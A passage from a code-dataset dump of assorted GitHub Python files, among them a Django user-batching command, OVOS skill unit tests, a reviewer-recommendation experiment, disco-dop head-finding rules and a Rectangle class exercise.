sum(downloads_list[date].values()) for date in dates}\n","repo_name":"ViZus-s/Libstats-bot","sub_path":"parsers/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"36580424112","text":"import requests\r\nimport json\r\n\r\nTOKEN_STR = 'procon30_example_token' # 仮トークン\r\nHOST = '127.0.0.1' # 仮\r\nPORT = '57557' # 仮\r\n\r\n# 試合前情報取得\r\ntoken = {'Authorization' : TOKEN_STR}\r\nmatch = requests.get('http://' + HOST + ':' + PORT + '/matches', headers=token)\r\n\r\n# debug\r\nprint(match) # httpレスポンス表示 401:失敗 200:成功\r\nprint(match.text) # jsonテキスト\r\n\r\nmatch_json = json.loads(match.text)","repo_name":"nnct-jo-ken/procon2019_kyogi","sub_path":"http_sample.py","file_name":"http_sample.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28104333644","text":"from django.core.management.base import BaseCommand, CommandError\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import Group\nfrom django.db import transaction\n\nUser = get_user_model()\n\n\nclass Command(BaseCommand):\n help = 'Adds number of users to a specified batch.'\n\n def add_arguments(self, parser):\n parser.add_argument('limit', type=int)\n parser.add_argument('batch', type=str)\n\n def handle(self, *args, **options):\n limit = options['limit']\n batch = options['batch']\n\n batch = Group.objects.filter(name=batch).first()\n if not batch:\n raise CommandError('Batch name does not exist.')\n\n users = User.objects.all().order_by('date_joined')\n\n print('Ready to start.')\n with transaction.atomic():\n for user in users:\n if limit < 1:\n break\n if user.groups.all():\n continue\n\n user.groups.add(batch)\n print(f'Added {user.username}')\n limit -= 1\n\n self.stdout.write(self.style.SUCCESS(f'Successfully added {options[\"limit\"] - limit} users'))\n","repo_name":"favourch/coretabs-academy","sub_path":"src/api/accounts/management/commands/preparebatch.py","file_name":"preparebatch.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27551100264","text":"#base62 tools (convert number <=> string)\n# v1.0/20130109\n# python 2.x/3.x supported\n#\n#author: Ady Liu(imxylz@gmail.com)\n#github: github.com/adyliu\n\nimport sys\nfrom Lab5.settings import CREATED_URL_MAX_LENGTH\n\nbasedigits='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'\nBASE=len(basedigits)\n\n\ndef decode(s):\n ret,mult = 0,1\n for c in reversed(s):\n ret += mult*basedigits.index(c)\n mult *= BASE\n return ret\n\ndef encode(num):\n if num <0: raise Exception(\"positive number \"+num)\n ret=''\n while num != 0:\n ret = (basedigits[num%BASE])+ret\n num = int(num/BASE)\n while len(ret) < CREATED_URL_MAX_LENGTH:\n ret = '0' + ret\n return ret\n","repo_name":"noavarice/Lab5","sub_path":"FileHandler/base62.py","file_name":"base62.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70154501354","text":"import json\nimport unittest\nfrom unittest.mock import Mock\n\nfrom ovos_bus_client import Message\n\nfrom ovos_workshop.skills.ovos import OVOSSkill\nfrom ovos_workshop.skills.mycroft_skill import MycroftSkill, is_classic_core\nfrom mycroft.skills import MycroftSkill as CoreSkill\nfrom ovos_utils.messagebus import FakeBus\nfrom os.path import dirname\nfrom ovos_workshop.skill_launcher import SkillLoader\n\n\nclass LegacySkill(CoreSkill):\n def __init__(self, skill_name=\"LegacySkill\", bus=None, **kwargs):\n self.inited = True\n self.initialized = False\n self.startup_called = False\n super().__init__(skill_name, bus, **kwargs)\n # __new__ calls `_startup` so this should be defined in __init__\n assert self.skill_id is not None\n\n def initialize(self):\n self.initialized = True\n\n def _startup(self, bus, skill_id=\"\"):\n self.startup_called = True\n self.initialize()\n\n\nclass BadLegacySkill(LegacySkill):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n print(self.bus) # not set, exception in property\n\n\nclass GoodLegacySkill(CoreSkill):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n print(self.bus) # maybe not set, exception in property\n\n\nclass SpecificArgsSkill(OVOSSkill):\n def __init__(self, skill_id=\"SpecificArgsSkill\", bus=None, **kwargs):\n self.inited = True\n self.initialized = False\n self.startup_called = False\n super().__init__(skill_id=skill_id, bus=bus, **kwargs)\n self.kwargs = kwargs\n\n def initialize(self):\n self.initialized = True\n\n def _startup(self, bus, skill_id=\"\"):\n self.startup_called = True\n self.initialize()\n\n\nclass KwargSkill(OVOSSkill):\n def __init__(self, **kwargs):\n self.inited = True\n self.initialized = False\n self.startup_called = False\n super().__init__(**kwargs)\n\n def initialize(self):\n self.initialized = True\n\n def _startup(self, bus, skill_id=\"\"):\n self.startup_called = True\n self.initialize()\n\n\nclass TestSkill(unittest.TestCase):\n def setUp(self):\n self.bus = FakeBus()\n self.bus.emitted_msgs = []\n\n def get_msg(msg):\n msg = json.loads(msg)\n self.bus.emitted_msgs.append(msg)\n\n self.bus.on(\"message\", get_msg)\n\n self.skill = SkillLoader(self.bus, f\"{dirname(__file__)}/ovos_tskill_abort\")\n self.skill.skill_id = \"abort.test\"\n self.bus.emitted_msgs = []\n\n self.skill.load()\n\n def test_skill_id(self):\n self.assertTrue(isinstance(self.skill.instance, OVOSSkill))\n self.assertTrue(isinstance(self.skill.instance, MycroftSkill))\n\n self.assertEqual(self.skill.skill_id, \"abort.test\")\n\n if not is_classic_core():\n # the metaclass ensures this returns True under ovos-core\n # but we have no control over mycroft-core so can not patch isinstance checks there\n self.assertTrue(isinstance(self.skill.instance, CoreSkill))\n\n # if running in ovos-core every message will have the skill_id in context\n for msg in self.bus.emitted_msgs:\n if msg[\"type\"] == 'mycroft.skills.loaded': # emitted by SkillLoader, not by skill\n continue\n self.assertEqual(msg[\"context\"][\"skill_id\"], \"abort.test\")\n\n def test_intent_register(self):\n padatious_intents = [\"abort.test:test.intent\",\n \"abort.test:test2.intent\",\n \"abort.test:test3.intent\"]\n for msg in self.bus.emitted_msgs:\n if msg[\"type\"] == \"padatious:register_intent\":\n self.assertTrue(msg[\"data\"][\"name\"] in padatious_intents)\n\n def test_registered_events(self):\n registered_events = [e[0] for e in self.skill.instance.events]\n\n # intent events\n intent_triggers = [f\"{self.skill.skill_id}:test.intent\",\n f\"{self.skill.skill_id}:test2.intent\",\n f\"{self.skill.skill_id}:test3.intent\"\n ]\n for event in intent_triggers:\n self.assertTrue(event in registered_events)\n\n # base skill class events shared with mycroft-core\n default_skill = [\"mycroft.skill.enable_intent\",\n \"mycroft.skill.disable_intent\",\n \"mycroft.skill.set_cross_context\",\n \"mycroft.skill.remove_cross_context\",\n \"mycroft.skills.settings.changed\"]\n for event in default_skill:\n self.assertTrue(event in registered_events)\n\n # base skill class events exclusive to ovos-core\n if not is_classic_core():\n default_ovos = [f\"{self.skill.skill_id}.converse.ping\",\n f\"{self.skill.skill_id}.converse.request\",\n \"intent.service.skills.activated\",\n \"intent.service.skills.deactivated\",\n f\"{self.skill.skill_id}.activate\",\n f\"{self.skill.skill_id}.deactivate\"]\n for event in default_ovos:\n self.assertTrue(event in registered_events)\n\n def test_stop(self):\n skill = self.skill.instance\n handle_stop = Mock()\n real_stop = skill.stop\n skill.stop = Mock()\n self.bus.once(f\"{self.skill.skill_id}.stop\", handle_stop)\n self.bus.emit(Message(\"mycroft.stop\"))\n handle_stop.assert_called_once()\n self.assertEqual(handle_stop.call_args[0][0].context['skill_id'],\n skill.skill_id)\n skill.stop.assert_called_once()\n\n skill.stop = real_stop\n\n def tearDown(self) -> None:\n self.skill.unload()\n\n\nclass TestSkillNew(unittest.TestCase):\n def test_legacy(self):\n bus = FakeBus()\n\n # a legacy skill accepts wrong args, but accepts kwargs\n legacy = LegacySkill(\"LegacyName\", bus, skill_id=\"legacy.mycroft\")\n self.assertTrue(legacy.inited)\n self.assertTrue(legacy.initialized)\n self.assertTrue(legacy.startup_called)\n self.assertIsNotNone(legacy.skill_id)\n self.assertEqual(legacy.bus, bus)\n\n # a legacy skill not accepting args at all\n with self.assertRaises(Exception) as ctxt:\n BadLegacySkill() # accesses self.bus in __init__\n self.assertTrue(\"Accessed MycroftSkill.bus in __init__\" in str(ctxt.exception))\n\n legacynoargs = LegacySkill() # no exception this time because bus is not used in init\n self.assertTrue(legacynoargs.inited)\n self.assertFalse(legacynoargs.initialized)\n self.assertFalse(legacynoargs.startup_called)\n\n # a legacy skill fully inited at once\n legacy = GoodLegacySkill(skill_id=\"legacy.mycroft\", bus=bus) # accesses self.bus in __init__\n self.assertEqual(legacy.skill_id, \"legacy.mycroft\")\n self.assertEqual(legacy.bus, bus)\n\n def test_load(self):\n bus = FakeBus()\n kwarg = KwargSkill(skill_id=\"kwarg\", bus=bus)\n self.assertTrue(kwarg.inited)\n self.assertTrue(kwarg.initialized)\n self.assertTrue(kwarg.startup_called)\n self.assertEqual(kwarg.skill_id, \"kwarg\")\n self.assertEqual(kwarg.bus, bus)\n\n gui = Mock()\n args = SpecificArgsSkill(\"args\", bus, gui=gui)\n self.assertTrue(args.inited)\n self.assertTrue(args.initialized)\n self.assertTrue(args.startup_called)\n self.assertEqual(args.skill_id, \"args\")\n self.assertEqual(args.bus, bus)\n self.assertEqual(args.gui, gui)\n","repo_name":"OpenVoiceOS/OVOS-workshop","sub_path":"test/unittests/test_skill.py","file_name":"test_skill.py","file_ext":"py","file_size_in_byte":7678,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"42665645275","text":"import math\nimport os\nimport time\nfrom common.utils import read_info\nfrom storage.utils import *\nfrom common import algorithms\nimport json\nfrom common.settings import PROJECT_NAME\nfrom multiprocessing import Pool\n\nfrom common.log import LogAdapter\nLOG = LogAdapter().set_log('CrossProject')\n\n\nclass TokenProcess(object):\n def __init__(self, project_name):\n file_name = project_name.split('/')[1]\n self.file_name = '{}.csv'.format(file_name)\n self.project_name = project_name\n\n def get_request_token(self, train_start_number):\n \"\"\"\n\n :param project_name: project name\n :return: get token dict by pull request\n \"\"\"\n token = self.__get_all_token()\n token_dict = dict()\n file_name = get_file_name(self.project_name,train_start_number)\n for key, value in file_name.items():\n request_token = []\n # the key is pull request number and the value is this pull request file list\n # print(key)\n for file in value:\n # if token list not this file ,will get empty list\n file_token = token.get(file,[])\n request_token.extend(file_token)\n # delete same token\n request_token = list(set(request_token))\n token_dict.update({key: request_token})\n request_token_dict = dict(sorted(token_dict.items(),key=lambda items: items[0]))\n return request_token_dict\n\n def __get_all_token(self):\n path = os.getcwd()\n path = os.path.dirname(path)\n csv_path = os.path.join(path, 'sample', self.file_name)\n result = read_info(csv_path)\n return result\n\n\nclass Algorithms(object):\n def __init__(self,project_name):\n self.project_name = project_name\n\n def main(self, Rn, Rp, reviewer, k):\n time1 = time.time()\n review_dict = {}\n lib_tech_new = list(Rn.values())[0]\n for key, value in Rp.items():\n lib_tech_past = list(value)\n past_review = reviewer.get(key)\n if not lib_tech_past or not lib_tech_new or not past_review:\n continue\n score = algorithms.cosine_similarity(lib_tech_new, lib_tech_past)\n for rpv in past_review:\n if rpv not in review_dict.keys():\n review_dict.setdefault(rpv, score)\n else:\n past_score = review_dict.get(rpv)\n review_dict.update({rpv: past_score + score})\n candidate_list_sort = sorted(review_dict.items(), key=lambda item: item[1], reverse=True)\n # print('---length is ',len(candidate_list_sort))\n split_list = candidate_list_sort[0:k]\n predict = candidate_list_sort[0:10]\n if not split_list:\n print('No Result')\n result = [i[0] for i in split_list]\n time2 = time.time()\n spend_time = time2 - time1\n print('spedn time is {}'.format(spend_time))\n return result,predict\n\n\ndef main(project_name,train_time):\n time1 = time.time()\n train_start_number = get_train_start_number(project_name,train_time)\n\n reviewer = get_reviewer(project_name)\n test_number = get_test_number(project_name)\n\n app = TokenProcess(project_name)\n all_token = app.get_request_token(train_start_number)\n alg = Algorithms(project_name)\n\n save_file_name = project_name.split('/')[1] + '_cross' +train_time.replace('-','_')\n\n invalid_id = []\n judge_dict1 = {'right': 0, 'wrong': 0,'all': 0}\n judge_dict3 = {'right': 0, 'wrong': 0,'all': 0}\n judge_dict5 = {'right': 0, 'wrong': 0,'all': 0}\n\n for i in test_number:\n\n judge_dict1['all'] += 1\n judge_dict3['all'] += 1\n judge_dict5['all'] += 1\n\n r = reviewer.get(i)\n if not r:\n invalid_id.append(i)\n with open('{}.txt'.format(save_file_name), 'a') as f:\n f.write(json.dumps({i: 'this pull request not comments!'}))\n f.write('\\n')\n continue\n\n token_info = all_token.get(i)\n new_token = {i: all_token.get(i)}\n # no token meaning this request file not import info\n if not token_info:\n invalid_id.append(i)\n with open('{}.txt'.format(save_file_name), 'a') as f:\n f.write(json.dumps({i: 'this pull request files not import info!'}))\n f.write('\\n')\n continue\n\n past_token = {k: v for k, v in all_token.items() if (k < i)}\n result, predict = alg.main(new_token, past_token, reviewer, 5)\n result1,result3,result5 = [result[0]],result[0:3], result\n with open('{}.txt'.format(save_file_name), 'a') as f:\n f.write(json.dumps({i: predict}))\n f.write('\\n')\n\n # print(result)\n # print(r)\n # 比较两个列表元素是否有相同元素,并拿到它。\n compare_result1 = set(result1) & set(r)\n compare_result3 = set(result3) & set(r)\n compare_result5 = set(result5) & set(r)\n\n print('result1', compare_result1)\n print('result3', compare_result3)\n print('result5', compare_result5)\n\n # print(compare_result)\n\n if compare_result1:\n judge_dict1['right'] += 1\n else:\n judge_dict1['wrong'] += 1\n\n if compare_result3:\n judge_dict3['right'] += 1\n else:\n judge_dict3['wrong'] += 1\n\n if compare_result5:\n judge_dict5['right'] += 1\n else:\n judge_dict5['wrong'] += 1\n\n time2 = time.time()\n spend_time = time2 - time1\n\n rate1 = '{:.2%}'.format(judge_dict1['right'] / (judge_dict1['right'] + judge_dict1['wrong']))\n rate3 = '{:.2%}'.format(judge_dict3['right'] / (judge_dict3['right'] + judge_dict3['wrong']))\n rate5 = '{:.2%}'.format(judge_dict5['right'] / (judge_dict5['right'] + judge_dict5['wrong']))\n with open('{}.txt'.format(save_file_name), 'a') as f:\n f.write(json.dumps(rate1))\n f.write(json.dumps(rate3))\n f.write(json.dumps(rate5))\n f.write('\\n')\n f.write('Total spend time is {}'.format(spend_time))\n\n value_dict1 = {'project:{} rate1:{}'.format(project_name, rate1): judge_dict1}\n value_dict3 = {'project:{} rate3:{}'.format(project_name, rate3): judge_dict3}\n value_dict5 = {'project:{} rate5:{}'.format(project_name, rate5): judge_dict5}\n\n with open('{}_rate.txt'.format(save_file_name), 'a') as f:\n f.write('{}\\n'.format(json.dumps(value_dict1)))\n f.write('{}\\n'.format(json.dumps(value_dict3)))\n f.write('{}\\n'.format(json.dumps(value_dict5)))\n f.write('Spend Time is {}'.format(spend_time))\n\n # LOG.info(value_dict1,value_dict3,value_dict5)\n print('Spend Time is {}'.format(spend_time))\n\n\nif __name__ == '__main__':\n if not PROJECT_NAME:\n print('No Project Name set.....')\n else:\n project_name_list = PROJECT_NAME\n pool = Pool()\n for project in project_name_list:\n print(project)\n train_time = [ONE_YEAR,HALF_YEAR,THREE_MONTH,ONE_MONTH]\n for i in train_time:\n print(i)\n pool.apply_async(main, (project, i))\n # main(project,i)\n\n pool.close()\n pool.join()\n","repo_name":"huyuanzhe/EmperimentalEvaluation","sub_path":"core/cross_project.py","file_name":"cross_project.py","file_ext":"py","file_size_in_byte":7264,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"42315052375","text":"from PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\n\nclass ComboListView(QListView):\n def __init__(self, p, cb):\n QListView.__init__(self, p)\n self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.setSelectionMode(QAbstractItemView.SingleSelection)\n\n def showEvent(self, e):\n if qVersion < '4.2': \n QListView.showEvent(self, e)\n return\n e.accept()\n model = self.model()\n rows = model.rowCount()\n col = self.modelColumn()\n mx = 0\n\n for i in range(0, rows):\n item = model.item(i, col)\n mx = max(mx, item.sizeHint().width())\n if rows:\n sz = QSize(mx, item.sizeHint().height())\n for i in range(0, rows):\n model.item(i, col).setSizeHint(sz)\n\n mx += 25\n\n if mx > self.parent().parent().width():\n self.setGeometry(self.pos().x(), self.pos().y(), \n mx, self.height())\n self.parent().setGeometry(self.parent().pos().x(),\n self.parent().pos().y(), mx, self.parent().height())\n QListView.showEvent(self, e)\n\n def keyPressEvent(self, e):\n if (e.key() == Qt.Key_Tab or e.key() == Qt.Key_Backtab):\n e.accept()\n ev = QKeyEvent(QEvent.KeyPress, e.key(), e.modifiers(),\n e.text(), e.isAutoRepeat(), e.count())\n QApplication.postEvent(self.parent().parent(),ev)\n return\n QListView.keyPressEvent(self, e)\n\n def event(self, e):\n if e.type() == QEvent.ShortcutOverride and e.key() == Qt.Key_Escape:\n self.clearSelection()\n return QListView.event(self, e)\n\n def focusOutEvent(self, e):\n # from the focus events posted at our combobox, we must...\n combobox = self.parent().parent()\n if e.reason() in (Qt.TabFocusReason, Qt.BacktabFocusReason,):\n combobox.hidePopup()\n idxs = self.selectedIndexes()\n if len(idxs) > 0 and combobox.currentIndex() != idxs[0].row():\n combobox.setCurrentIndex(idxs[0].row())\n combobox.emit(SIGNAL(\"activated(int)\"),combobox.currentIndex())\n combobox.emit(SIGNAL(\"activated(const QString &)\"),\n combobox.currentText())\n QListView.focusOutEvent(self, e)\n","repo_name":"tomkins/spellcraftcalc","sub_path":"ComboListView.py","file_name":"ComboListView.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"465396029","text":"# coding: utf-8\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nimport pytest\nfrom hamcrest import has_entry, assert_that\n\nfrom common.models.geo import Settlement, Country\nfrom common.tester.factories import create_station, create_settlement\nfrom travel.rasp.train_api.serialization.segment_station import SegmentStationSchema\n\n\npytestmark = pytest.mark.dbuser\n\n\ndef test_segment_station_schema():\n station = create_station(id=20, title='Название', popular_title='Популярное название',\n settlement=Settlement.MOSCOW_ID, country=Country.RUSSIA_ID)\n\n result = {\n 'id': 20,\n 'title': 'Название',\n 'popularTitle': 'Популярное название',\n 'settlementId': Settlement.MOSCOW_ID,\n 'timezone': 'Europe/Moscow',\n 'country': None\n }\n\n assert SegmentStationSchema().dump(station)[0] == result\n result['codes'] = {'express': '222'}\n assert SegmentStationSchema(context={'express_by_station_id_cache': {20: '222'}}).dump(station)[0] == result\n\n\ndef test_codes():\n station = create_station()\n assert_that(SegmentStationSchema(context={'express_by_station_id_cache': {station.id: '222'}}).dump(station)[0],\n has_entry('codes', {'express': '222'}))\n\n\n@pytest.mark.parametrize('station_zone, settlement_zone, result', {\n ('Asia/Omsk', 'Europe/Oslo', 'Europe/Oslo'),\n ('Asia/Omsk', 'Asia/Omsk', 'Asia/Omsk'),\n})\ndef test_timezone_dump(station_zone, settlement_zone, result):\n station = create_station(settlement=create_settlement(time_zone=settlement_zone), time_zone=station_zone)\n assert_that(SegmentStationSchema().dump(station)[0], has_entry('timezone', result))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/serialization/test_segment_station (2).py","file_name":"test_segment_station (2).py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4478513062","text":"\"\"\"Functions related to finding the linguistic head of a constituent.\"\"\"\nimport io\nimport re\nfrom collections import defaultdict, Counter\nfrom .tree import Tree, HEAD, COMPLEMENT, MODIFIER\nfrom .punctuation import ispunct\n\nFIELDS = tuple(range(8))\nWORD, LEMMA, TAG, MORPH, FUNC, PARENT, SECEDGETAG, SECEDGEPARENT = FIELDS\nHEADRULERE = re.compile(r'^(\\S+)\\s+(LEFT-TO-RIGHT|RIGHT-TO-LEFT'\n\t\tr'|LEFT|RIGHT|LEFTDIS|RIGHTDIS|LIKE)(?:\\s+(.*))?$')\n\n\ndef applyheadrules(tree, headrules, modifierrules=None):\n\t\"\"\"Apply head rules and set head attribute of nodes.\"\"\"\n\tfor node in tree.subtrees(\n\t\t\tlambda n: n and isinstance(n[0], Tree)):\n\t\thead = headfinder(node, headrules)\n\t\tif head is not None:\n\t\t\thead.type = HEAD\n\t\t\tif modifierrules is not None:\n\t\t\t\tmarkmodifiers(node, modifierrules)\n\n\ndef getheadpos(node):\n\t\"\"\"Get head word dominated by this node.\"\"\"\n\tchild = node\n\twhile True:\n\t\tif not child:\n\t\t\tbreak\n\t\tif not isinstance(child[0], Tree):\n\t\t\treturn child\n\t\ttry:\n\t\t\tchild = next(a for a in child if a.type == HEAD)\n\t\texcept StopIteration:\n\t\t\tbreak\n\treturn None\n\n\ndef readheadrules(filename):\n\t\"\"\"Read a file containing heuristic rules for head assignment.\n\n\tExample line: ``s right-to-left vmfin vafin vaimp``, which means\n\ttraverse siblings of an S constituent from right to left, the first child\n\twith a label of vmfin, vafin, or vaimp will be marked as head.\"\"\"\n\theadrules = {}\n\twith io.open(filename, encoding='utf8') as inp:\n\t\tfor line in inp:\n\t\t\tline = line.strip().upper()\n\t\t\tif line and not line.startswith(\"%\") and len(line.split()) > 2:\n\t\t\t\ttry:\n\t\t\t\t\tlabel, direction, heads = HEADRULERE.match(line).groups()\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tprint('no match:', line)\n\t\t\t\t\traise\n\t\t\t\tif heads is None:\n\t\t\t\t\theads = ''\n\t\t\t\theadrules.setdefault(label, [])\n\t\t\t\tif direction == 'LIKE':\n\t\t\t\t\theadrules[label].extend(headrules[heads])\n\t\t\t\telse:\n\t\t\t\t\theadrules[label].append((direction, heads.split()))\n\treturn headrules\n\n\ndef headfinder(tree, headrules, headlabels=frozenset({'HD'})):\n\t\"\"\"Use head finding rules to select one child of tree node as head.\"\"\"\n\tdef find(heads, children):\n\t\t\"\"\"Match children with possible heads.\"\"\"\n\t\tfor head in heads:\n\t\t\tfor child in children:\n\t\t\t\tif (isinstance(child, Tree)\n\t\t\t\t\t\tand child.label.split('[')[0].upper() == head):\n\t\t\t\t\treturn child\n\n\tdef invfind(heads, children):\n\t\t\"\"\"Inverted version of find().\"\"\"\n\t\tfor child in children:\n\t\t\tfor head in heads:\n\t\t\t\tif (isinstance(child, Tree)\n\t\t\t\t\t\tand child.label.split('[')[0].upper() == head):\n\t\t\t\t\treturn child\n\n\t# check if we already have head information:\n\tfor child in tree:\n\t\tif child.type == HEAD:\n\t\t\treturn child\n\tfor child in tree:\n\t\tif (child.source and not headlabels.isdisjoint(\n\t\t\t\tchild.source[FUNC].upper().split('-'))):\n\t\t\treturn child\n\t# apply heuristic rules:\n\thead = None\n\tchildren = tree\n\tfor direction, heads in headrules.get(tree.label, []):\n\t\tif direction.startswith('LEFT'):\n\t\t\tchildren = tree\n\t\telif direction.startswith('RIGHT'):\n\t\t\tchildren = tree[::-1]\n\t\telse:\n\t\t\traise ValueError('expected RIGHT or LEFT.')\n\t\tif direction in ('LEFTDIS', 'RIGHTDIS'):\n\t\t\thead = invfind(heads, children)\n\t\telse:\n\t\t\thead = find(heads, children)\n\t\tif head is not None:\n\t\t\tbreak\n\tif head is None:\n\t\t# default head is initial/last nonterminal (depending on direction)\n\t\tfor child in children:\n\t\t\tif (isinstance(child, Tree)\n\t\t\t\t\tand not ispunct(None, child)):\n\t\t\t\treturn child\n\t\treturn children[0]\n\telse: # PTB-specific\n\t\ti = tree.index(head)\n\t\tif i >= 2 and tree[i - 1].label in {'CC', 'CONJP'}:\n\t\t\tfor althead in tree[i - 2::-1]:\n\t\t\t\tif not ispunct(althead.label, althead):\n\t\t\t\t\treturn althead\n\t\treturn head\n\n\ndef readmodifierrules(filename):\n\t\"\"\"Read a file containing heuristic rules for marking modifiers.\n\n\tExample line: ``S *-MOD``, which means that for an S\n\tconstituent, any child with the MOD function tag is a modifier.\n\tA default rule can be specified by using * as the first label, which\n\talways matches (in addition to another matching rule, if any).\n\tIf none of the rules matches, a non-terminal is assumed to be a complement.\n\t\"\"\"\n\tmodifierrules = {}\n\twith io.open(filename, encoding='utf8') as inp:\n\t\tfor line in inp:\n\t\t\tline = line.strip().upper()\n\t\t\tif line and not line.startswith(\"%\"):\n\t\t\t\tlabel, modifiers = line.split(None, 1)\n\t\t\t\tif label in modifierrules:\n\t\t\t\t\traise ValueError('duplicate rule for %r (each label'\n\t\t\t\t\t\t\t' should occur at most once in the file)' % label)\n\t\t\t\tmodifierrules[label] = modifiers.split()\n\treturn modifierrules\n\n\ndef markmodifiers(tree, modifierrules):\n\t\"\"\"Use heuristics to distinguish complements from modifiers.\n\n\tShould be applied after heads have been identified.\"\"\"\n\tfrom discodop.treebanktransforms import function\n\tprev = None\n\tfor child in tree:\n\t\tif child.type == HEAD:\n\t\t\tcontinue\n\t\tchild.type = COMPLEMENT\n\t\tapplicablerules = modifierrules.get(tree.label.split('-', 1)[0], []\n\t\t\t\t) + modifierrules.get('*', [])\n\t\tfor mod in applicablerules:\n\t\t\tif ((child.label.split('-', 1)[0].upper() == mod.split('-', 1)[0]\n\t\t\t\t\tor mod.split('-', 1)[0] == '*')\n\t\t\t\t\tand ('-' not in mod\n\t\t\t\t\t\tor mod.split('-', 1)[1] == '*'\n\t\t\t\t\t\tor function(child).upper() == mod.split('-', 1)[1])):\n\t\t\t\tchild.type = MODIFIER\n\t\t\t\tbreak\n\t\tif child.label == prev: # mark enumerations/lists as modifiers\n\t\t\tchild.type = MODIFIER\n\t\tprev = child.label\n\n\ndef saveheads(tree, tailmarker):\n\t\"\"\"Infer head from binarization and store.\"\"\"\n\tif tailmarker:\n\t\tfor node in tree.subtrees(lambda n: tailmarker in n.label):\n\t\t\tnode.type = HEAD\n\telse:\n\t\t# assume head-outward binarization; the last binarized node has the head.\n\t\tfor node in tree.subtrees(lambda n: '|<' in n.label\n\t\t\t\tand not any(child.label.startswith(\n\t\t\t\t\tn.label[:n.label.index('|<') + 2])\n\t\t\t\t\tfor child in n)):\n\t\t\tnode[-1].type = HEAD\n\n\ndef headstats(trees):\n\t\"\"\"Collect some information useful for writing headrules.\n\n\t- ``heads['NP']['NN'] ==`` number of times NN occurs as head of NP.\n\t- ``pos1['NP'][1] ==`` number of times head of NP is at position 1.\n\t- ``pos2`` is like pos1, but position is from the right.\n\t- ``unknown['NP']['NN'] ==`` number of times NP that does not have a head\n\t\tdominates an NN.\"\"\"\n\theads, unknown = defaultdict(Counter), defaultdict(Counter)\n\tpos1, pos2 = defaultdict(Counter), defaultdict(Counter)\n\tfor tree in trees:\n\t\tfor a in tree.subtrees(lambda x: len(x) > 1):\n\t\t\tfor n, b in enumerate(a):\n\t\t\t\tif b.type == HEAD:\n\t\t\t\t\theads[a.label][b.label] += 1\n\t\t\t\t\tpos1[a.label][n] += 1\n\t\t\t\t\tpos2[a.label][len(a) - (n + 2)] += 1\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tunknown[a.label].update(b.label for b in a)\n\treturn heads, unknown, pos1, pos2\n\n\n__all__ = ['getheadpos', 'readheadrules', 'headfinder', 'saveheads',\n\t\t'headstats', 'applyheadrules']\n","repo_name":"andreasvc/disco-dop","sub_path":"discodop/heads.py","file_name":"heads.py","file_ext":"py","file_size_in_byte":6644,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"72"} +{"seq_id":"10483472599","text":"#!/usr/bin/python3\n\"\"\" 0x0C. Python - Almost a circle \"\"\"\n\n\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\" First Rectangle \"\"\"\n def __init__(self, width, height, x=0, y=0, id=None):\n super().__init__(id)\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n\n @property\n def width(self):\n return self.__width\n\n @width.setter\n def width(self, value):\n if type(value) is not int:\n raise TypeError(\"width must be an integer\")\n if value <= 0:\n raise ValueError(\"width must be > 0\")\n self.__width = value\n\n @property\n def height(self):\n return self.__height\n\n @height.setter\n def height(self, value):\n if type(value) is not int:\n raise TypeError(\"height must be an integer\")\n if value <= 0:\n raise ValueError(\"height must be > 0\")\n self.__height = value\n\n @property\n def x(self):\n return self.__x\n\n @x.setter\n def x(self, value):\n if type(value) is not int:\n raise TypeError(\"x must be an integer\")\n if value < 0:\n raise ValueError(\"x must be >= 0\")\n self.__x = value\n\n @property\n def y(self):\n return self.__y\n\n @y.setter\n def y(self, value):\n if type(value) is not int:\n raise TypeError(\"y must be an integer\")\n if value < 0:\n raise ValueError(\"y must be >= 0\")\n self.__y = value\n\n def area(self):\n \"\"\" Area first \"\"\"\n return self.width * self.__height\n\n def display(self):\n \"\"\" Display #0 \"\"\"\n if self.__y != 0:\n for lines in range(self.__y):\n print()\n for lines in range(self.__height):\n print((self.__x * \" \") + ('#' * self.__width))\n\n def __str__(self):\n \"\"\" __str__ \"\"\"\n return \"[{}] ({}) {}/{} - {}/{}\".format(self.__class__.__name__,\n self.id, self.__x, self.__y,\n self.__width, self.__height)\n\n def update(self, *args, **kwargs):\n \"\"\" Update #0 \"\"\"\n if len(kwargs) != 0:\n for keys, values in kwargs.items():\n setattr(self, keys, values)\n elif len(args) != 0:\n try:\n self.id = args[0]\n self.__width = args[1]\n self.__height = args[2]\n self.__x = args[3]\n self.__y = args[4]\n except IndexError:\n pass\n else:\n print()\n\n def to_dictionary(self):\n \"\"\" Rectangle instance to dictionary represultentation \"\"\"\n return {'id': self.id, 'width': self.__width, 'height': self.__height,\n 'x': self.__x, 'y': 